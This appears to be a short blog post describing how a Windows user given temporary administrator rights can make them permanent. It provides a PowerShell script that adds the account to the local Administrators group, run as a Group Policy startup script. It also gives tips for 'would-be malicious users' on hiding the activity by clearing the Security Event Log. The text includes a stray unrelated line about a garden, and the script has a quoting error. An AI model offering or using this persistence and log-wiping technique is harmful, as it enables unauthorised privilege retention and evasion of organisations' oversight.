19 January 2015

Once you granted 24h admin rights to a user he is able to grant himself privileges with a just few clicks. Startup scripts give an easy means to do this.

About startup scripts.

With startup scripts Windows offers administrators a powerful tool to run commands at system boot. Scripts are stored in directory %windir%\System32\Group Policy\Machine\Scripts\Startup and executed with system privileges.

But just adding a script to the startup directory is not sufficient to execute the script. Because startup scripts could be easily used to compromise a system they have to be enabled through the Local Group Policy Editor gpedit.msc. And at least for enabling a startup script with gpedit.msc local admin privileges are required.

3 Steps for 24h admins to get admin privileges again.

1. Create a PowerShell script for adding your user account to the local administrators group.

# addMalUser.ps1
$Domain = "YourDomain
$Computer = "YourComputer"
$Username = "YourUsername"

$Group = [ADSI]"WinNT://$Computer/Administrators,group"
$User = [ADSI]"WinNT://$Domain/$Username,user"
$Group.Add($User.Path)

Save this script to file addMalUser.ps1. To get the exact values for $Domain, $Computer and $User please run set in a command prompt.

1. Copy script addMalUser.ps1 to %windir%\System32\GroupPolicy\Machine\Scripts\Startup.

2. Start gpedit.msc and add script addMalUser.ps1 to the startup scripts.

Tips for would-be malicious users.

1. 

   Purple Loosestrife in my Garden. Feels like Summer.

   Please note that this operation is recorded in the Security Event Log of your computer.
   Never mind! Only very few organizations are scanning security events on user workstations. Those which tolerate 24h admin rights are certainly not amongst them.

2. Please feel free to add switches to this script to run it on demand only. This will help to hide your malicious activities, because you could remove yourself from the admin group or reset the Security Event Log after the job is done.

Have Fun with 24h Admin Rights!